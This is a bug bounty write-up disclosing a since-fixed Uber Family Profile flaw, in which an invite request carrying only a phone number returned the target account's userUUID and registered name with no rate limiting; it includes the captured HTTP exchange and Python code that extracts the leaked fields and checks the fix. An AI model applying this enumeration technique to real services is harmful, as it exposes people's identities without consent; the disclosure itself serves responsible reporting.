
Kevin Roh

Bug Bounty Participant


A few months ago Uber came out with Family Profile, which allows you to pay for another Uber rider's fares.

Intercepting the traffic while the profile is being created does not show much, but intercepting the request that adds a member to the profile after it exists returns some interesting information.

Request

PUT /rt/family/group/0725983c-4bf1-4513-99d7-bf5b983c6d8a/members HTTP/1.1
Host: cn-sjc1.uber.com
x-uber-device-language: en_US
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: client/iphone/2.136.2
x-uber-device-epoch: 1464724246914
x-uber-device-v-accuracy: 4.00000
x-uber-client-version: 2.136.2
x-uber-client-name: client
x-uber-cloudkit-id: _...
x-uber-device-h-accuracy: 5.00000
x-uber-device-location-latitude: xxxx
x-uber-device-os: 9.3.1
Content-Length: 85
x-uber-device-id-tracking-enabled: 1
x-uber-device-ids: aaid:...
Connection: close
X-Uber-RedirectCount: 0
Accept-Language: en-us
x-uber-token: ...
x-uber-device-location-altitude: xxxx
x-uber-device-model: iPhone7,2
x-uber-client-id: com.ubercab.UberClient
Content-Type: application/json
x-uber-device: iphone
x-uber-device-location-longitude: xxxx
X-Uber-DCURL: ...

{"newMemberInvitees":[{"familyName":"","givenName":"rohk","phoneNumber":"PHONE_NUMBER_HERE"}]}

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 May 2016 19:54:45 GMT
Content-Type: application/json
Connection: close
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
expires: 0
x-uber-request-uuid: ...
X-Uber-App: rtapi
Strict-Transport-Security: max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 671

{"unsuccessfulInvites":[],"familyMembers":[{"isOrganizer":true,"familyName":"ROH","memberUUID":"46653c9f-ff63-4a4a-9f3f-0393610bc1cf","updatedAt":1464724067,"userUUID":"72225a84-53c4-4766-9ca1-6eec06cbaa13","groupUUID":"0725983c-4bf1-4513-99d7-bf5b983c6d8a","givenName":"KEVIN","lastInvitedAt":1464724065,"createdAt":1464724065,"confirmedAt":1464724065},{"isOrganizer":false,"familyName":"LAST_NAME","memberUUID":"de1d691b-f40a-4209-821d-f779977b2901","updatedAt":1464724485,"userUUID":"906d29c8-7b17-4e90-900e-1af72e1c72a6","groupUUID":"0725983c-4bf1-4513-99d7-bf5b983c6d8a","givenName":"FIRST_NAME","lastInvitedAt":1464724485,"createdAt":1464724485,"confirmedAt":null}]}

The request body only contains a phone number (plus whatever name the inviter types in), yet the response returns the invited account's userUUID together with the first and last name registered on that account. So from a phone number alone we now have the user's userUUID, first name, last name and phone number.

If the phone number is not associated with any account, the response reveals nothing about it; the only effect is that a text invite is sent to that number.

Throughout testing there was no rate limiting on this endpoint, so a list of phone numbers could be replayed against it one after another.
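To make the leak concrete, here is an added Python example (it is not code from the original post or from Uber) that builds the invite body shown above, diffs the family member list before and after the invite to isolate the newly added member, and reports which account fields that entry reveals for the submitted phone number. The "after" response is the one captured above; the organizer-only "before" list and the post-fix response shape (the same response minus userUUID) are constructed assumptions for this example.

```python
import json
from typing import Any, Dict, List, Optional

# Organizer-only member list as it would look right after the profile is
# created. Constructed for this example from the organizer entry in the
# captured response; the writeup does not show the pre-invite state.
SAMPLE_BEFORE: Dict[str, Any] = {
    "unsuccessfulInvites": [],
    "familyMembers": [
        {
            "isOrganizer": True,
            "familyName": "ROH",
            "memberUUID": "46653c9f-ff63-4a4a-9f3f-0393610bc1cf",
            "userUUID": "72225a84-53c4-4766-9ca1-6eec06cbaa13",
            "groupUUID": "0725983c-4bf1-4513-99d7-bf5b983c6d8a",
            "givenName": "KEVIN",
            "createdAt": 1464724065,
            "confirmedAt": 1464724065,
        }
    ],
}

# The response captured in the writeup after inviting one phone number.
SAMPLE_AFTER: Dict[str, Any] = json.loads(
    '{"unsuccessfulInvites":[],"familyMembers":[{"isOrganizer":true,"familyName":"ROH",'
    '"memberUUID":"46653c9f-ff63-4a4a-9f3f-0393610bc1cf","updatedAt":1464724067,'
    '"userUUID":"72225a84-53c4-4766-9ca1-6eec06cbaa13",'
    '"groupUUID":"0725983c-4bf1-4513-99d7-bf5b983c6d8a","givenName":"KEVIN",'
    '"lastInvitedAt":1464724065,"createdAt":1464724065,"confirmedAt":1464724065},'
    '{"isOrganizer":false,"familyName":"LAST_NAME",'
    '"memberUUID":"de1d691b-f40a-4209-821d-f779977b2901","updatedAt":1464724485,'
    '"userUUID":"906d29c8-7b17-4e90-900e-1af72e1c72a6",'
    '"groupUUID":"0725983c-4bf1-4513-99d7-bf5b983c6d8a","givenName":"FIRST_NAME",'
    '"lastInvitedAt":1464724485,"createdAt":1464724485,"confirmedAt":null}]}'
)

# Fields in a member entry that describe the invited account rather than
# the group membership itself.
LEAK_FIELDS = ("userUUID", "givenName", "familyName")


def build_invite_body(phone_number: str, given_name: str, family_name: str = "") -> str:
    """Body for PUT /rt/family/group/<groupUUID>/members, byte-for-byte as captured."""
    body = {
        "newMemberInvitees": [
            {"familyName": family_name, "givenName": given_name, "phoneNumber": phone_number}
        ]
    }
    return json.dumps(body, separators=(",", ":"))


def new_members(before: Dict[str, Any], after: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Members present in `after` but not in `before`, keyed on memberUUID.

    Matching on the submitted givenName would not work: the response carries
    the name registered on the target account, not the name the inviter typed.
    """
    known = {m["memberUUID"] for m in before.get("familyMembers", [])}
    return [m for m in after.get("familyMembers", []) if m["memberUUID"] not in known]


def leaked_fields(member: Dict[str, Any]) -> Dict[str, Any]:
    """Account-describing fields that are present and non-empty in one member entry."""
    return {k: member[k] for k in LEAK_FIELDS if member.get(k)}


def resolve_phone(phone_number: str, before: Dict[str, Any], after: Dict[str, Any]) -> Optional[Dict[str, Any]]:
    """Map one submitted phone number to what the response reveals about its account.

    Returns None when no new member appeared (number not tied to an account) or
    when more than one appeared (several invitees in one request; ambiguous).
    """
    added = new_members(before, after)
    if len(added) != 1:
        return None
    return {"phoneNumber": phone_number, **leaked_fields(added[0])}


def still_leaks_user_uuid(response: Dict[str, Any]) -> bool:
    """Retest check: does any non-organizer member entry still carry a userUUID?"""
    return any(
        "userUUID" in m
        for m in response.get("familyMembers", [])
        if not m.get("isOrganizer")
    )


def strip_user_uuid(response: Dict[str, Any]) -> Dict[str, Any]:
    """Assumed shape of the response after the fix: unchanged, minus userUUID."""
    fixed = json.loads(json.dumps(response))
    for m in fixed.get("familyMembers", []):
        m.pop("userUUID", None)
    return fixed


SAMPLE_FIXED: Dict[str, Any] = strip_user_uuid(SAMPLE_AFTER)

if __name__ == "__main__":
    print(build_invite_body("PHONE_NUMBER_HERE", "rohk"))
    print(resolve_phone("PHONE_NUMBER_HERE", SAMPLE_BEFORE, SAMPLE_AFTER))
    print("leaks before fix:", still_leaks_user_uuid(SAMPLE_AFTER))
    print("leaks after fix: ", still_leaks_user_uuid(SAMPLE_FIXED))
```

Diffing on memberUUID rather than on the name is deliberate: the response shows the account's own registered name (not the "rohk" sent in the request), so the name is part of what leaks, not something to match on. `still_leaks_user_uuid` is the one-line retest to run once a fix like the one described below is deployed.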

Resolved

  • Uber removed the userUUID from the response
  • Rate limiting was implemented, allowing only 20 requests

Uber has resolved this issue and a bounty was given.